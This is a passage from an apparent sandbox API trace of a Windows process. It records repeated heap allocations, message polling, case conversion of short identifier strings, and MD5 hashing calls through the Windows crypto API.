wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0256.263] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0256.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.263] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0256.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.263] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.264] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0256.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.264] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0256.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.264] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0256.265] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0256.265] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.265] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0256.265] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.265] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.265] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.265] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.266] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.266] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.266] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.266] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.266] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.266] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.266] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.266] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.267] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.267] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.267] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.268] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.268] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.268] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.268] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.268] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0256.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0256.268] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.269] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0256.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.270] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.270] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.271] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0256.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0256.272] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.272] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0256.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0256.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0256.273] CryptHashData (hHash=0xaa5820, pbData=0x24b1728, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0256.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 